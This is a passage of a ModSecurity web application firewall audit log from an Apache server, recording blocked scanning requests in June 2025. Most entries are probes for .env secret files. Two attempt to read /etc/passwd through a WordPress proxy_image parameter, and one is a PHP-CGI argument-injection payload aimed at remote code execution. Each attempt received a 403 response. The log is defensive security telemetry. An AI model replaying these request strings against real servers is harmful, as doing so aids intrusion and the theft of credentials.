p3=0, p4=0, p5=42, sr=167, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec77614-Z-- --d7eca652-A-- [08/Jun/2025:06:58:26 +0700] aETSIqD1_iznf-QmBECClAAAAII 103.236.140.4 48998 103.236.140.4 8181 --d7eca652-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LG-H918 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 Accept-Charset: utf-8 --d7eca652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7eca652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749340706482033 789 (- - -) Stopwatch2: 1749340706482033 789; combined=332, p1=292, p2=0, p3=0, p4=0, p5=40, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7eca652-Z-- --cded3e69-A-- [08/Jun/2025:06:58:26 +0700] aETSIqD1_iznf-QmBECClQAAAIA 103.236.140.4 49000 103.236.140.4 8181 --cded3e69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 Accept-Charset: utf-8 --cded3e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cded3e69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749340706603255 755 (- - -) Stopwatch2: 1749340706603255 755; combined=334, p1=302, p2=0, p3=0, p4=0, p5=32, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cded3e69-Z-- --23c8aa18-A-- [08/Jun/2025:07:39:28 +0700] aETbwIsoVckF-yt1MVzGJAAAAMg 103.236.140.4 49792 103.236.140.4 8181 --23c8aa18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --23c8aa18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23c8aa18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343168214854 933 (- - -) Stopwatch2: 1749343168214854 933; combined=413, p1=365, p2=0, p3=0, p4=0, p5=48, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23c8aa18-Z-- --75456542-A-- [08/Jun/2025:07:39:40 +0700] aETbzMCyjFxjzV1Pwa0mVQAAABg 103.236.140.4 49796 103.236.140.4 8181 --75456542-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --75456542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75456542-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343180068331 859 (- - -) Stopwatch2: 1749343180068331 859; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75456542-Z-- --c9072d0c-A-- [08/Jun/2025:07:40:08 +0700] aETb6IsoVckF-yt1MVzGJQAAAMo 103.236.140.4 49798 103.236.140.4 8181 --c9072d0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c9072d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9072d0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343208126988 901 (- - -) Stopwatch2: 1749343208126988 901; combined=418, p1=380, p2=0, p3=0, p4=0, p5=38, sr=178, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9072d0c-Z-- --17ef971b-A-- [08/Jun/2025:07:40:10 +0700] aETb6sCyjFxjzV1Pwa0mVgAAAAI 103.236.140.4 49800 103.236.140.4 8181 --17ef971b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/8.0.57838 Mobile/12H321 Safari/600.1.4 Accept-Charset: utf-8 --17ef971b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17ef971b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343210127929 655 (- - -) Stopwatch2: 1749343210127929 655; combined=259, p1=224, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ef971b-Z-- --a05a8503-A-- [08/Jun/2025:07:40:11 +0700] aETb66D1_iznf-QmBECDNQAAAIM 103.236.140.4 49802 103.236.140.4 8181 --a05a8503-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --a05a8503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a05a8503-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749343211324961 671 (- - -) Stopwatch2: 1749343211324961 671; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a05a8503-Z-- --3a7f9c0d-A-- [08/Jun/2025:07:56:52 +0700] aETf1Me0OZpePEzoRnpEMgAAAEM 103.236.140.4 50376 103.236.140.4 8181 --3a7f9c0d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.132 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.132 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3a7f9c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a7f9c0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749344212264326 929 (- - -) Stopwatch2: 1749344212264326 929; combined=417, p1=377, p2=0, p3=0, p4=0, p5=40, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a7f9c0d-Z-- --171c9c15-A-- [08/Jun/2025:07:56:53 +0700] aETf1aD1_iznf-QmBECDXAAAAI4 103.236.140.4 50380 103.236.140.4 8181 --171c9c15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.132 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.132 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --171c9c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --171c9c15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749344213493952 755 (- - -) Stopwatch2: 1749344213493952 755; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --171c9c15-Z-- --10eb3931-A-- [08/Jun/2025:08:06:42 +0700] aETiIse0OZpePEzoRnpE1wAAAEA 103.236.140.4 52218 103.236.140.4 8181 --10eb3931-B-- GET /wp-admin/admin-ajax.php?action=proxy_image&url=file:///etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 169.197.140.18 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 169.197.140.18 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 Accept: */* --10eb3931-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10eb3931-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:url. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:url: file:/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749344802068791 1740 (- - -) Stopwatch2: 1749344802068791 1740; combined=775, p1=414, p2=323, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10eb3931-Z-- --37a06248-A-- [08/Jun/2025:08:06:42 +0700] aETiIse0OZpePEzoRnpE2AAAAFU 103.236.140.4 52214 103.236.140.4 8181 --37a06248-B-- GET /wp-admin/admin-ajax.php?action=proxy_image&url=file:///etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 169.197.140.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 169.197.140.18 Accept-Encoding: gzip X-Varnish: 170239857 --37a06248-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --37a06248-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:url. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:url: file:/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749344802200011 1663 (- - -) Stopwatch2: 1749344802200011 1663; combined=608, p1=333, p2=249, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37a06248-Z-- --f3d6964a-A-- [08/Jun/2025:08:37:30 +0700] aETpWqD1_iznf-QmBECE6AAAAJM 103.236.140.4 52758 103.236.140.4 8181 --f3d6964a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --f3d6964a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3d6964a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749346650951364 755 (- - -) Stopwatch2: 1749346650951364 755; combined=316, p1=279, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3d6964a-Z-- --6ba10711-A-- [08/Jun/2025:08:45:40 +0700] aETrRMCyjFxjzV1Pwa0nXgAAAAE 103.236.140.4 52868 103.236.140.4 8181 --6ba10711-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --6ba10711-C-- --6ba10711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ba10711-E-- --6ba10711-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749347140597175 4128 (- - -) Stopwatch2: 1749347140597175 4128; combined=2195, p1=521, p2=1631, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ba10711-Z-- --a7c7b948-A-- [08/Jun/2025:09:03:56 +0700] aETvjMCyjFxjzV1Pwa0nZwAAABE 103.236.140.4 53144 103.236.140.4 8181 --a7c7b948-B-- GET /production/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 Accept-Charset: utf-8 --a7c7b948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c7b948-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749348236996891 925 (- - -) Stopwatch2: 1749348236996891 925; combined=420, p1=378, p2=0, p3=0, p4=0, p5=41, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c7b948-Z-- --f54efc02-A-- [08/Jun/2025:09:30:51 +0700] aET128e0OZpePEzoRnpE8QAAAFA 103.236.140.4 53252 103.236.140.4 8181 --f54efc02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.117.67 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.117.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f54efc02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f54efc02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749349851242812 854 (- - -) Stopwatch2: 1749349851242812 854; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f54efc02-Z-- --7791d145-A-- [08/Jun/2025:09:43:58 +0700] aET47se0OZpePEzoRnpE9wAAAEU 103.236.140.4 53306 103.236.140.4 8181 --7791d145-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36 Accept-Charset: utf-8 --7791d145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7791d145-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749350638133991 809 (- - -) Stopwatch2: 1749350638133991 809; combined=339, p1=301, p2=0, p3=0, p4=0, p5=38, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7791d145-Z-- --fcce6f4f-A-- [08/Jun/2025:10:13:35 +0700] aET_36D1_iznf-QmBECFNQAAAJQ 103.236.140.4 53886 103.236.140.4 8181 --fcce6f4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/53.0 --fcce6f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcce6f4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749352415836572 788 (- - -) Stopwatch2: 1749352415836572 788; combined=391, p1=353, p2=0, p3=0, p4=0, p5=37, sr=149, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcce6f4f-Z-- --f7756721-A-- [08/Jun/2025:10:13:36 +0700] aET_4IsoVckF-yt1MVzIrQAAANg 103.236.140.4 53888 103.236.140.4 8181 --f7756721-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; itel it1407; Android/4.4.2; Release/11.19.2015) AppleWebKit/534.30 (KHTML, like Gecko) Mobile Safari/534.30 --f7756721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7756721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749352416264210 714 (- - -) Stopwatch2: 1749352416264210 714; combined=321, p1=281, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7756721-Z-- --22ff7a14-A-- [08/Jun/2025:13:20:45 +0700] aEUrvcCyjFxjzV1Pwa0x2gAAAAA 103.236.140.4 37206 103.236.140.4 8181 --22ff7a14-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Charset: utf-8 --22ff7a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ff7a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 